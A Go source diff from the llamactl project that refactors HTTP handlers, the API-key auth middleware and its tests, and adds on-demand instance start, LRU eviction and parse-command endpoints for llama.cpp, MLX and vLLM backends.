"os/exec"
"strconv"
@@ -14,27 +21,43 @@ import (
)
type Handler struct {
InstanceManager InstanceManager
config Config
InstanceManager manager.InstanceManager
cfg config.AppConfig
}
func NewHandler(im InstanceManager, config Config) *Handler {
func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
return &Handler{
InstanceManager: im,
config: config,
cfg: cfg,
}
}
// HelpHandler godoc
// VersionHandler godoc
// @Summary Get llamactl version
// @Description Returns the version of the llamactl command
// @Tags version
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /version [get]
func (h *Handler) VersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "text/plain")
fmt.Fprintf(w, "Version: %s\nCommit: %s\nBuild Time: %s\n", h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime)
}
}
// LlamaServerHelpHandler godoc
// @Summary Get help for llama server
// @Description Returns the help text for the llama server command
// @Tags server
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Help text"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/help [get]
func (h *Handler) HelpHandler() http.HandlerFunc {
// @Router /backends/llama-cpp/help [get]
func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
helpCmd := exec.Command("llama-server", "--help")
output, err := helpCmd.CombinedOutput()
@@ -47,16 +70,16 @@ func (h *Handler) HelpHandler() http.HandlerFunc {
}
}
// VersionHandler godoc
// LlamaServerVersionHandler godoc
// @Summary Get version of llama server
// @Description Returns the version of the llama server command
// @Tags server
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/version [get]
func (h *Handler) VersionHandler() http.HandlerFunc {
// @Router /backends/llama-cpp/version [get]
func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
versionCmd := exec.Command("llama-server", "--version")
output, err := versionCmd.CombinedOutput()
@@ -69,16 +92,16 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
}
}
// ListDevicesHandler godoc
// LlamaServerListDevicesHandler godoc
// @Summary List available devices for llama server
// @Description Returns a list of available devices for the llama server
// @Tags server
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "List of devices"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/devices [get]
func (h *Handler) ListDevicesHandler() http.HandlerFunc {
// @Router /backends/llama-cpp/devices [get]
func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
listCmd := exec.Command("llama-server", "--list-devices")
output, err := listCmd.CombinedOutput()
@@ -97,7 +120,7 @@ func (h *Handler) ListDevicesHandler() http.HandlerFunc {
// @Tags instances
// @Security ApiKeyAuth
// @Produces json
// @Success 200 {array} Instance "List of instances"
// @Success 200 {array} instance.Process "List of instances"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances [get]
func (h *Handler) ListInstances() http.HandlerFunc {
@@ -124,8 +147,8 @@ func (h *Handler) ListInstances() http.HandlerFunc {
// @Accept json
// @Produces json
// @Param name path string true "Instance Name"
// @Param options body CreateInstanceOptions true "Instance configuration options"
// @Success 201 {object} Instance "Created instance details"
// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 201 {object} instance.Process "Created instance details"
// @Failure 400 {string} string "Invalid request body"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [post]
@@ -137,13 +160,13 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
return
}
var options CreateInstanceOptions
var options instance.CreateInstanceOptions
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
return
}
instance, err := h.InstanceManager.CreateInstance(name, &options)
inst, err := h.InstanceManager.CreateInstance(name, &options)
if err != nil {
http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError)
return
@@ -151,7 +174,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(http.StatusCreated)
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -165,7 +188,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Instance details"
// @Success 200 {object} instance.Process "Instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [get]
@@ -177,14 +200,14 @@ func (h *Handler) GetInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.GetInstance(name)
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -199,8 +222,8 @@ func (h *Handler) GetInstance() http.HandlerFunc {
// @Accept json
// @Produces json
// @Param name path string true "Instance Name"
// @Param options body CreateInstanceOptions true "Instance configuration options"
// @Success 200 {object} Instance "Updated instance details"
// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 200 {object} instance.Process "Updated instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [put]
@@ -212,20 +235,20 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
return
}
var options CreateInstanceOptions
var options instance.CreateInstanceOptions
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
return
}
instance, err := h.InstanceManager.UpdateInstance(name, &options)
inst, err := h.InstanceManager.UpdateInstance(name, &options)
if err != nil {
http.Error(w, "Failed to update instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -239,7 +262,7 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Started instance details"
// @Success 200 {object} instance.Process "Started instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/start [post]
@@ -251,14 +274,20 @@ func (h *Handler) StartInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.StartInstance(name)
inst, err := h.InstanceManager.StartInstance(name)
if err != nil {
// Check if error is due to maximum running instances limit
if _, ok := err.(manager.MaxRunningInstancesError); ok {
http.Error(w, err.Error(), http.StatusConflict)
return
}
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -272,7 +301,7 @@ func (h *Handler) StartInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Stopped instance details"
// @Success 200 {object} instance.Process "Stopped instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/stop [post]
@@ -284,14 +313,14 @@ func (h *Handler) StopInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.StopInstance(name)
inst, err := h.InstanceManager.StopInstance(name)
if err != nil {
http.Error(w, "Failed to stop instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -305,7 +334,7 @@ func (h *Handler) StopInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Restarted instance details"
// @Success 200 {object} instance.Process "Restarted instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/restart [post]
@@ -317,14 +346,14 @@ func (h *Handler) RestartInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.RestartInstance(name)
inst, err := h.InstanceManager.RestartInstance(name)
if err != nil {
http.Error(w, "Failed to restart instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -389,13 +418,13 @@ func (h *Handler) GetInstanceLogs() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.GetInstance(name)
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
logs, err := instance.GetLogs(num_lines)
logs, err := inst.GetLogs(num_lines)
if err != nil {
http.Error(w, "Failed to get logs: "+err.Error(), http.StatusInternalServerError)
return
@@ -426,19 +455,19 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.GetInstance(name)
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
if !instance.Running {
if !inst.IsRunning() {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
// Get the cached proxy for this instance
proxy, err := instance.GetProxy()
proxy, err := inst.GetProxy()
if err != nil {
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
return
@@ -453,6 +482,9 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
proxyPath = "/" + proxyPath
}
// Update the last request time for the instance
inst.UpdateLastRequestTime()
// Modify the request to remove the proxy prefix
originalPath := r.URL.Path
r.URL.Path = proxyPath
@@ -489,11 +521,11 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
}
openaiInstances := make([]OpenAIInstance, len(instances))
for i, instance := range instances {
for i, inst := range instances {
openaiInstances[i] = OpenAIInstance{
ID: instance.Name,
ID: inst.Name,
Object: "model",
Created: instance.Created,
Created: inst.Created,
OwnedBy: "llamactl",
}
}
@@ -519,7 +551,7 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
// @Accept json
// @Produces json
// @Success 200 "OpenAI response"
// @Failure 400 {string} string "Invalid request body or model name"
// @Failure 400 {string} string "Invalid request body or instance name"
// @Failure 500 {string} string "Internal Server Error"
// @Router /v1/ [post]
func (h *Handler) OpenAIProxy() http.HandlerFunc {
@@ -532,7 +564,7 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
}
r.Body.Close()
// Parse the body to extract model name
// Parse the body to extract instance name
var requestBody map[string]any
if err := json.Unmarshal(bodyBytes, &requestBody); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
@@ -541,28 +573,59 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
modelName, ok := requestBody["model"].(string)
if !ok || modelName == "" {
http.Error(w, "Model name is required", http.StatusBadRequest)
http.Error(w, "Instance name is required", http.StatusBadRequest)
return
}
// Route to the appropriate instance based on model name
instance, err := h.InstanceManager.GetInstance(modelName)
// Route to the appropriate inst based on instance name
inst, err := h.InstanceManager.GetInstance(modelName)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
if !instance.Running {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
if !inst.IsRunning() {
allowOnDemand := inst.GetOptions() != nil && inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart
if !allowOnDemand {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
if h.InstanceManager.IsMaxRunningInstancesReached() {
if h.cfg.Instances.EnableLRUEviction {
err := h.InstanceManager.EvictLRUInstance()
if err != nil {
http.Error(w, "Cannot start Instance, failed to evict instance "+err.Error(), http.StatusInternalServerError)
return
}
} else {
http.Error(w, "Cannot start Instance, maximum number of instances reached", http.StatusConflict)
return
}
}
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
}
proxy, err := instance.GetProxy()
proxy, err := inst.GetProxy()
if err != nil {
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
return
}
// Update last request time for the instance
inst.UpdateLastRequestTime()
// Recreate the request body from the bytes we read
r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
r.ContentLength = int64(len(bodyBytes))
@@ -570,3 +633,163 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
proxy.ServeHTTP(w, r)
}
}
// ParseCommandRequest represents the request body for command parsing
type ParseCommandRequest struct {
Command string `json:"command"`
}
// ParseLlamaCommand godoc
// @Summary Parse llama-server command
// @Description Parses a llama-server command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Failure 500 {object} map[string]string "Internal Server Error"
// @Router /backends/llama-cpp/parse-command [post]
func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
llamaOptions, err := llamacpp.ParseLlamaCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: llamaOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
}
}
}
// ParseMlxCommand godoc
// @Summary Parse mlx_lm.server command
// @Description Parses MLX-LM server command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /backends/mlx/parse-command [post]
func (h *Handler) ParseMlxCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
mlxOptions, err := mlx.ParseMlxCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
// Currently only support mlx_lm backend type
backendType := backends.BackendTypeMlxLm
options := &instance.CreateInstanceOptions{
BackendType: backendType,
MlxServerOptions: mlxOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
}
}
}
// ParseVllmCommand godoc
// @Summary Parse vllm serve command
// @Description Parses a vLLM serve command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /backends/vllm/parse-command [post]
func (h *Handler) ParseVllmCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
vllmOptions, err := vllm.ParseVllmCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
backendType := backends.BackendTypeVllm
options := &instance.CreateInstanceOptions{
BackendType: backendType,
VllmServerOptions: vllmOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
}
}
}
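All three parse-command handlers accept the same ParseCommandRequest body and return the parsed instance.CreateInstanceOptions as JSON. A client-side sketch for the llama.cpp variant, assuming the route is mounted under /api/v1 as in the router changes below; the base URL and the omission of auth headers are illustration-only assumptions:

// Illustrative client program (assumed llamactl address; management auth omitted).
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"io"
	"log"
	"net/http"
)

func main() {
	body, _ := json.Marshal(map[string]string{
		"command": "llama-server --model /path/to/model.gguf --port 8080",
	})
	resp, err := http.Post(
		"http://localhost:8080/api/v1/backends/llama-cpp/parse-command", // assumed base URL
		"application/json",
		bytes.NewReader(body),
	)
	if err != nil {
		log.Fatal(err)
	}
	defer resp.Body.Close()
	parsed, _ := io.ReadAll(resp.Body)
	fmt.Println(string(parsed)) // JSON-encoded instance.CreateInstanceOptions
}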


@@ -1,10 +1,11 @@
package llamactl
package server
import (
"crypto/rand"
"crypto/subtle"
"encoding/hex"
"fmt"
"llamactl/pkg/config"
"log"
"net/http"
"os"
@@ -26,7 +27,7 @@ type APIAuthMiddleware struct {
}
// NewAPIAuthMiddleware creates a new APIAuthMiddleware with the given configuration
func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
func NewAPIAuthMiddleware(authCfg config.AuthConfig) *APIAuthMiddleware {
var generated bool = false
@@ -35,25 +36,25 @@ func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
const banner = "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
if config.RequireManagementAuth && len(config.ManagementKeys) == 0 {
if authCfg.RequireManagementAuth && len(authCfg.ManagementKeys) == 0 {
key := generateAPIKey(KeyTypeManagement)
managementAPIKeys[key] = true
generated = true
fmt.Printf("%s\n⚠ MANAGEMENT AUTHENTICATION REQUIRED\n%s\n", banner, banner)
fmt.Printf("🔑 Generated Management API Key:\n\n %s\n\n", key)
}
for _, key := range config.ManagementKeys {
for _, key := range authCfg.ManagementKeys {
managementAPIKeys[key] = true
}
if config.RequireInferenceAuth && len(config.InferenceKeys) == 0 {
if authCfg.RequireInferenceAuth && len(authCfg.InferenceKeys) == 0 {
key := generateAPIKey(KeyTypeInference)
inferenceAPIKeys[key] = true
generated = true
fmt.Printf("%s\n⚠ INFERENCE AUTHENTICATION REQUIRED\n%s\n", banner, banner)
fmt.Printf("🔑 Generated Inference API Key:\n\n %s\n\n", key)
}
for _, key := range config.InferenceKeys {
for _, key := range authCfg.InferenceKeys {
inferenceAPIKeys[key] = true
}
@@ -66,9 +67,9 @@ func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
}
return &APIAuthMiddleware{
requireInferenceAuth: config.RequireInferenceAuth,
requireInferenceAuth: authCfg.RequireInferenceAuth,
inferenceKeys: inferenceAPIKeys,
requireManagementAuth: config.RequireManagementAuth,
requireManagementAuth: authCfg.RequireManagementAuth,
managementKeys: managementAPIKeys,
}
}


@@ -1,18 +1,18 @@
package llamactl_test
package server_test
import (
"llamactl/pkg/config"
"llamactl/pkg/server"
"net/http"
"net/http/httptest"
"strings"
"testing"
llamactl "llamactl/pkg"
)
func TestAuthMiddleware(t *testing.T) {
tests := []struct {
name string
keyType llamactl.KeyType
keyType server.KeyType
inferenceKeys []string
managementKeys []string
requestKey string
@@ -22,7 +22,7 @@ func TestAuthMiddleware(t *testing.T) {
// Valid key tests
{
name: "valid inference key for inference",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "sk-inference-valid123",
method: "GET",
@@ -30,7 +30,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "valid management key for inference", // Management keys work for inference
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
managementKeys: []string{"sk-management-admin123"},
requestKey: "sk-management-admin123",
method: "GET",
@@ -38,7 +38,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "valid management key for management",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-admin123"},
requestKey: "sk-management-admin123",
method: "GET",
@@ -48,7 +48,7 @@ func TestAuthMiddleware(t *testing.T) {
// Invalid key tests
{
name: "inference key for management should fail",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
inferenceKeys: []string{"sk-inference-user123"},
requestKey: "sk-inference-user123",
method: "GET",
@@ -56,7 +56,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "invalid inference key",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "sk-inference-invalid",
method: "GET",
@@ -64,7 +64,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "missing inference key",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "",
method: "GET",
@@ -72,7 +72,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "invalid management key",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "sk-management-invalid",
method: "GET",
@@ -80,7 +80,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "missing management key",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "",
method: "GET",
@@ -90,7 +90,7 @@ func TestAuthMiddleware(t *testing.T) {
// OPTIONS requests should always pass
{
name: "OPTIONS request bypasses inference auth",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "",
method: "OPTIONS",
@@ -98,7 +98,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "OPTIONS request bypasses management auth",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "",
method: "OPTIONS",
@@ -108,7 +108,7 @@ func TestAuthMiddleware(t *testing.T) {
// Cross-key-type validation
{
name: "management key works for inference endpoint",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{},
managementKeys: []string{"sk-management-admin"},
requestKey: "sk-management-admin",
@@ -119,11 +119,11 @@ func TestAuthMiddleware(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
config := llamactl.AuthConfig{
cfg := config.AuthConfig{
InferenceKeys: tt.inferenceKeys,
ManagementKeys: tt.managementKeys,
}
middleware := llamactl.NewAPIAuthMiddleware(config)
middleware := server.NewAPIAuthMiddleware(cfg)
// Create test request
req := httptest.NewRequest(tt.method, "/test", nil)
@@ -133,12 +133,12 @@ func TestAuthMiddleware(t *testing.T) {
// Create test handler using the appropriate middleware
var handler http.Handler
if tt.keyType == llamactl.KeyTypeInference {
handler = middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if tt.keyType == server.KeyTypeInference {
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
} else {
handler = middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
}
@@ -170,17 +170,17 @@ func TestAuthMiddleware(t *testing.T) {
func TestGenerateAPIKey(t *testing.T) {
tests := []struct {
name string
keyType llamactl.KeyType
keyType server.KeyType
}{
{"inference key generation", llamactl.KeyTypeInference},
{"management key generation", llamactl.KeyTypeManagement},
{"inference key generation", server.KeyTypeInference},
{"management key generation", server.KeyTypeManagement},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test auto-generation by creating config that will trigger it
var config llamactl.AuthConfig
if tt.keyType == llamactl.KeyTypeInference {
var config config.AuthConfig
if tt.keyType == server.KeyTypeInference {
config.RequireInferenceAuth = true
config.InferenceKeys = []string{} // Empty to trigger generation
} else {
@@ -189,19 +189,19 @@ func TestGenerateAPIKey(t *testing.T) {
}
// Create middleware - this should trigger key generation
middleware := llamactl.NewAPIAuthMiddleware(config)
middleware := server.NewAPIAuthMiddleware(config)
// Test that auth is required (meaning a key was generated)
req := httptest.NewRequest("GET", "/", nil)
recorder := httptest.NewRecorder()
var handler http.Handler
if tt.keyType == llamactl.KeyTypeInference {
handler = middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if tt.keyType == server.KeyTypeInference {
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
} else {
handler = middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
}
@@ -214,18 +214,18 @@ func TestGenerateAPIKey(t *testing.T) {
}
// Test uniqueness by creating another middleware instance
middleware2 := llamactl.NewAPIAuthMiddleware(config)
middleware2 := server.NewAPIAuthMiddleware(config)
req2 := httptest.NewRequest("GET", "/", nil)
recorder2 := httptest.NewRecorder()
if tt.keyType == llamactl.KeyTypeInference {
handler2 := middleware2.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if tt.keyType == server.KeyTypeInference {
handler2 := middleware2.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler2.ServeHTTP(recorder2, req2)
} else {
handler2 := middleware2.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler2 := middleware2.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler2.ServeHTTP(recorder2, req2)
@@ -307,21 +307,21 @@ func TestAutoGeneration(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
config := llamactl.AuthConfig{
cfg := config.AuthConfig{
RequireInferenceAuth: tt.requireInference,
RequireManagementAuth: tt.requireManagement,
InferenceKeys: tt.providedInference,
ManagementKeys: tt.providedManagement,
}
middleware := llamactl.NewAPIAuthMiddleware(config)
middleware := server.NewAPIAuthMiddleware(cfg)
// Test inference behavior if inference auth is required
if tt.requireInference {
req := httptest.NewRequest("GET", "/v1/models", nil)
recorder := httptest.NewRecorder()
handler := middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler := middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
@@ -338,7 +338,7 @@ func TestAutoGeneration(t *testing.T) {
req := httptest.NewRequest("GET", "/api/v1/instances", nil)
recorder := httptest.NewRecorder()
handler := middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler := middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
